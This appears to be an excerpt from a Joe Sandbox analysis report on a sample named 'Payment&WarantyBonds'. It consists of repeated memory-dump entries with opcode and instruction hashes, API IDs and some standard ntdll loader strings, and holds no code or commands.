                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 2bf09f1de6902e566e4e568cdb70679f26fa52a2c35c5356c02c8d454f27508e
                                                                                                                                                                                • Instruction ID: a4b2817b5af2c9582a0d673208b1ca45411785c524fb5968b48528c1702df133
                                                                                                                                                                                • Opcode Fuzzy Hash: 2bf09f1de6902e566e4e568cdb70679f26fa52a2c35c5356c02c8d454f27508e
                                                                                                                                                                                • Instruction Fuzzy Hash: E201FC322142169BC720DF6EC848D67BBE8FF54764F654129ED59C7180F7349A01C7D1
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: bd275c3eb20093ae5eccdfb78ca7c39998e1fb6bb9e8d04624567989b58739a2
                                                                                                                                                                                • Instruction ID: 6fa0d51e4328b501fbc8e19b1ad8c40f0ad255d82a045b28681fa0a00a5bdf1a
                                                                                                                                                                                • Opcode Fuzzy Hash: bd275c3eb20093ae5eccdfb78ca7c39998e1fb6bb9e8d04624567989b58739a2
                                                                                                                                                                                • Instruction Fuzzy Hash: 3C115B71A0120DABDB15EFA8C880EEE7BB5EB48354F104099BD01D7344DB34EA51CBA1
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: beeeaa9ce26e05ed4db198cbf759fbd4d7a466768c55de02d47ee1f15f0db72e
                                                                                                                                                                                • Instruction ID: 9e2f162c242b6fbfcb9762b3912b9d319d5bd4b889b59cf9c039e3bda87ff84d
                                                                                                                                                                                • Opcode Fuzzy Hash: beeeaa9ce26e05ed4db198cbf759fbd4d7a466768c55de02d47ee1f15f0db72e
                                                                                                                                                                                • Instruction Fuzzy Hash: CB1139B16183099FC700DF6DD841A9BBBE8EF98710F00455EB998D7395E670EA10CBA6
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                                                                                                                                                                • Instruction ID: 28f4b68403491788d09d350625ffd7d47c52f9273ba5c29b227d1f64bf94921f
                                                                                                                                                                                • Opcode Fuzzy Hash: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                                                                                                                                                                • Instruction Fuzzy Hash: 3701D4322007069FD7219A6DD844F96BBEAFBC5310F044859F642CBA90EAB0F980C795
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 58719d3729c84cac42b3ea03e31e5d43fa2f8b6c639c45e52f28a6a4a4616bd2
                                                                                                                                                                                • Instruction ID: 4b3e85b76ad1113b76cd670397bd8ef729cb62557c610b14adeb05c3fbe4ca58
                                                                                                                                                                                • Opcode Fuzzy Hash: 58719d3729c84cac42b3ea03e31e5d43fa2f8b6c639c45e52f28a6a4a4616bd2
                                                                                                                                                                                • Instruction Fuzzy Hash: B3113CB16183099FC710DF6DD44195BBBE4FF99750F00451EB998D7354E630EA00CBA6
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                                                                                                                • Instruction ID: c619072081ee11728d48b05bd567d1a6e66f6184d711be8181722a9de57c5158
                                                                                                                                                                                • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                                                                                                                • Instruction Fuzzy Hash: 92017C32600584DFE323D71DC948F667BDCFB44B58F0914A1FD05CBA92D628DE40C621
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: cbf3e2789b2f9449366b739104bf9b1c57dace49faa0ef3ff2ce0c1bb55280a4
                                                                                                                                                                                • Instruction ID: 5760cdf0aaf6c7bb2889342d5075094735664afa14beb57458d1391ab01dcc26
                                                                                                                                                                                • Opcode Fuzzy Hash: cbf3e2789b2f9449366b739104bf9b1c57dace49faa0ef3ff2ce0c1bb55280a4
                                                                                                                                                                                • Instruction Fuzzy Hash: 0301A470305685EBE322AB6CCD48F253BA9BB80B04F5801A4BA15DB6D6E728D7018621
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                                                                                                • Instruction ID: 79307dc28da84dbd81a628fce33d393506385dd1a96d89ee0aaef7d680f257ef
                                                                                                                                                                                • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                                                                                                • Instruction Fuzzy Hash: FCF0BE36341A1347FF36AA2E8820F2FAA95AF90B01B4D452C9701CB680DFA0DA048791
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 5b68732047824c74e23c6dedb469928befef73357a92cee8d2635a240fd3feee
                                                                                                                                                                                • Instruction ID: 8263d7c72be27777e3a26be97c0f49a3404a682837cefd35aa45f44a14fe2624
                                                                                                                                                                                • Opcode Fuzzy Hash: 5b68732047824c74e23c6dedb469928befef73357a92cee8d2635a240fd3feee
                                                                                                                                                                                • Instruction Fuzzy Hash: 96F0AF716193089FC310EF68C441A1AB7E4FF98714F80465ABC98DB394EA34EA00CB96
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                                                                                                                                • Instruction ID: 50019c138f585666e514ce002170ac783669d93318d4763b2f95a417484cf28c
                                                                                                                                                                                • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                                                                                                                                • Instruction Fuzzy Hash: C2F082337256229BE331AA4ECC80F1AB7A8EFD5B60F190065AA04DB264C760ED01C7D0
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                                                                                                                                • Instruction ID: c50ffdaa2d8e69c378ffbe1c6d7c8a792063c53277aa0e9441fdb46fc22ef15d
                                                                                                                                                                                • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                                                                                                                                • Instruction Fuzzy Hash: 87F0B472614204AFE714DF25CC05F56B6E9EFE8344F188078AA45D7264FAB0DE01C694
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 4f5ed9a31cc03a12517ee802cc08bdfd042ed66dc823db68979c934a6cf6ff51
                                                                                                                                                                                • Instruction ID: 0dfd6370299495307dc79a6b58538d439fd37e321c632dfb2d023aa5c97d6d8c
                                                                                                                                                                                • Opcode Fuzzy Hash: 4f5ed9a31cc03a12517ee802cc08bdfd042ed66dc823db68979c934a6cf6ff51
                                                                                                                                                                                • Instruction Fuzzy Hash: C3F04F70A0124D9FCB04EFA9C515A9EB7B4EF18304F10805AB955EB385DA38EB01CB65
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: a1c8135be5ef06a9ca61923b5ab7194f6cd148cc1079ee93230a3e7e2f818f6b
                                                                                                                                                                                • Instruction ID: 8c4e3b7d500fabe56c742b08e6b459b922c90480c501e4368df5c0bdaed89f83
                                                                                                                                                                                • Opcode Fuzzy Hash: a1c8135be5ef06a9ca61923b5ab7194f6cd148cc1079ee93230a3e7e2f818f6b
                                                                                                                                                                                • Instruction Fuzzy Hash: 95F0F0719862DC9EE7A38B2CC804B21BBD49B08725F084C6AC789C3582C7A0DB80C611
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 2c5e31ff7707414a08b9062473e0b9e3c6a8e032f3c15aeb243ecc35ae5a91aa
                                                                                                                                                                                • Instruction ID: 61490b3ac7fdae6d6a818f77c6ce5e28559c26970875ce5e069f4a0259fc093e
                                                                                                                                                                                • Opcode Fuzzy Hash: 2c5e31ff7707414a08b9062473e0b9e3c6a8e032f3c15aeb243ecc35ae5a91aa
                                                                                                                                                                                • Instruction Fuzzy Hash: 66F0272A516A8086CF325B2C68907D5AB54E781B50F29114ED9A0D7306E578C783CB21
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 5409087c610923569d1ecfd2c27b1240386f0d981bae312b5fcdc36fe1ecdb8b
                                                                                                                                                                                • Instruction ID: 9d1e05f104e1818094bf8a5da35b25dda0106a72e2804225917b97779330c6db
                                                                                                                                                                                • Opcode Fuzzy Hash: 5409087c610923569d1ecfd2c27b1240386f0d981bae312b5fcdc36fe1ecdb8b
                                                                                                                                                                                • Instruction Fuzzy Hash: A4F052714012809FEB22876CC408B11BBE89B807A4F0C982FC402D3522E720EA80DAD1
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                                                                                                                • Instruction ID: dea38223d81a9030c3e2799aa883fdf6a07f0126b0911190512c0b6f3d070b60
                                                                                                                                                                                • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                                                                                                                • Instruction Fuzzy Hash: 5DE092323006016BE7219E5D9C80F477B6E9FD6B10F040079B5049F251C9E29E0986A5
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
Memory Dump Source
• Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                                                                                                                                • Instruction ID: 558510f8839cc8585801fb63234d2697ab9e0e32860be8b847b2456379e9c87d
                                                                                                                                                                                • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                                                                                                                                • Instruction Fuzzy Hash: 05E0EC369506849BDF52DF5DCA40F5ABBB9BB94B40F150458A5089B660C624EA00CB40
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                                                                                                • Instruction ID: 0d848b8558f325a130f0f6f67e7361b5d887bae2d4c8786d9432ec2c37661216
                                                                                                                                                                                • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                                                                                                • Instruction Fuzzy Hash: DAD0123321607197DB2956596954F67BA19EF81AA4F1A006D7A0ED3A04C5158C42D6E0
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                                                                                                                                • Instruction ID: e68d03834cab99d76d2cec4bcf182754c342298f2b8eba97f138946365cc3c31
                                                                                                                                                                                • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                                                                                                                                • Instruction Fuzzy Hash: 04D012371D054DBBCB119F66DC01F957BA9E764BA0F444020B904C75A0D63AE950D584
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: c87b622b9e7ece6a4236543d5b1188b2b64cedcdf17742a516e45eca64655ec6
                                                                                                                                                                                • Instruction ID: 16329d031b68b93dc2a27f99636a4f04e1124e951bc974d9d0770472d2c28bc3
                                                                                                                                                                                • Opcode Fuzzy Hash: c87b622b9e7ece6a4236543d5b1188b2b64cedcdf17742a516e45eca64655ec6
                                                                                                                                                                                • Instruction Fuzzy Hash: 53D05230A010028BDF2BEB08CA54E2A3AB4FB50740B44006CEB00E2020E328DA028A80
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                                                                                                                • Instruction ID: 289b1eeff673886595a38afbb06ffe63dab3aaadfbb592b01b5b05349c54358a
                                                                                                                                                                                • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                                                                                                                • Instruction Fuzzy Hash: 8FD0C936216E80CFD61BCB0CC9A4F5533A8BB44B44F814490F401CBB26D63CDA80CA00
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                                                                                                • Instruction ID: 863ef163e531ddc87b6d8c0843eb524d570e0816851fc5b7c10b6203c4764527
                                                                                                                                                                                • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                                                                                                • Instruction Fuzzy Hash: 2CC01233290648AFC712AA99CD01F027BA9EBA8B50F000021F6048B670D631E920EA84
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                                                                                                • Instruction ID: ee1e5bf76feb05525783333f431e2b6d8002ac4286a9cef1114af0290c110af6
                                                                                                                                                                                • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                                                                                                • Instruction Fuzzy Hash: EFD01236100248EFCB02DF45C890D9A772AFBD8710F108019FD19076108A31ED62DA90
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                                                                                                • Instruction ID: cbd8389e54cd17c3163537c45779d0b0a1fecf3235d4763f0c353d17e22f3cd0
                                                                                                                                                                                • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                                                                                                • Instruction Fuzzy Hash: B5C04C757115418FCF15DB1DD694F4577E4F744750F150890EC45DB721E624EE01CA11
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ___swprintf_l
                                                                                                                                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                                                • API String ID: 48624451-2108815105
                                                                                                                                                                                • Opcode ID: 699260abc55db063fa12d63e8820083c8e3f163fcaf6abf6d543e4ffd133e1c5
                                                                                                                                                                                • Instruction ID: ac23de48fb500d35b4afcf67ba69a75185f83c6d14bf788d342e7f61133f3053
                                                                                                                                                                                • Opcode Fuzzy Hash: 699260abc55db063fa12d63e8820083c8e3f163fcaf6abf6d543e4ffd133e1c5
                                                                                                                                                                                • Instruction Fuzzy Hash: 0751F6B6A0411EBFDB11DBAC989097EFBB9BB083407148229F4A5D7642D734DF0087A0
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ___swprintf_l
                                                                                                                                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                                                • API String ID: 48624451-2108815105
                                                                                                                                                                                • Opcode ID: 4bf5bd5f7a77cdaacc0c494fd6cb0c675c5c171d6ff49ef11333654d7ce3e145
                                                                                                                                                                                • Instruction ID: 44c98392fce92e671d1afc68ff197d3865f8cab0129e0b2f09c605f4bcd57db0
                                                                                                                                                                                • Opcode Fuzzy Hash: 4bf5bd5f7a77cdaacc0c494fd6cb0c675c5c171d6ff49ef11333654d7ce3e145
                                                                                                                                                                                • Instruction Fuzzy Hash: 4251D5B1A00646AACB64DE5CC8D09BFB7BAEB44305B048459F5A6D7742D678EB40C760
                                                                                                                                                                                Strings
                                                                                                                                                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01874742
                                                                                                                                                                                • Execute=1, xrefs: 01874713
                                                                                                                                                                                • ExecuteOptions, xrefs: 018746A0
                                                                                                                                                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 018746FC
                                                                                                                                                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01874655
                                                                                                                                                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 01874787
                                                                                                                                                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01874725
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                                                • API String ID: 0-484625025
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
